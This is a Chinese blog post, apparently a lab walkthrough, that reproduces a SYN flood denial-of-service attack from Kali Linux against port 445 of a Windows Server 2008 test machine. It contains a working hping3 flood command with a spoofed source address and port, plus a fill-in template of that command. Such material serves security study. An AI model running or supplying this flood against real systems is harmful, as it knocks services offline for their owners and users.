SYN Flood 的攻击复现(对445端口进行攻击)

本文详细描述了如何利用Kali作为攻击机,对WindowsServer2008进行445端口的SYNFlood攻击,包括攻击前的准备,如网络配置和使用hping3工具执行攻击。攻击者通过伪造源IP和端口,阻止回应,展示了一种直接攻击方法。
摘要由CSDN通过智能技术生成

SYN Flood 的攻击复现(对445端口进行攻击)

前言

直接攻击

直接攻击IP地址不被欺骗的SYN Flood被称为直接攻击。在这次攻击中,攻击者根本不掩盖其IP地址。由于攻击者使用具有真实IP地址的单个源设备来创建攻击,因此攻击者极易受到发现和缓解的影响。为了在目标机器上创建半开状态,黑客可以防止其机器响应服务器的SYN-ACK数据包。这通常是通过阻止除SYN数据包之外的传出数据包的防火墙规则来实现的,或者在到达恶意用户机器之前过滤任何传入的SYN-ACK数据包。实际上,这种方法很少使用(如果有的话),因为减轻是非常简单的 – 只是阻止每个恶意系统的IP地址。

1、攻击前的准备

攻击机:kali (172.16.129.46)

靶机:winserver 2008(172.16.129.175)

确保两者能够互相ping通(就是要处于同一个网段之下)

在这里插入图片描述

注意:如果修改了,就要重新启动虚拟机方可生效

在这里插入图片描述

ping一下,验证成功

在这里插入图片描述

2、开始攻击

2.1、打开kali(攻击机)和windowsever2008(目标靶机)

在这里插入图片描述

2.2 先打开windows server2008的命令管理器

在这里插入图片描述

2.3然后发起攻击

输入

hping3 -q -n -a 2.2.2.2 -S -s 53 --keep -p 445 --flood 172.16.129.175

hping3 -q -n -a 伪造源IP -S -s 伪造源端口 --keep -p 目的端口 --flood 目的IP

在这里插入图片描述

等待一段时间后,ctrl+c 取消攻击

由于攻击过程卡住无法截图,停止攻击后可以观察:

windows server2008的命令管理器

在这里插入图片描述

  • 8
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值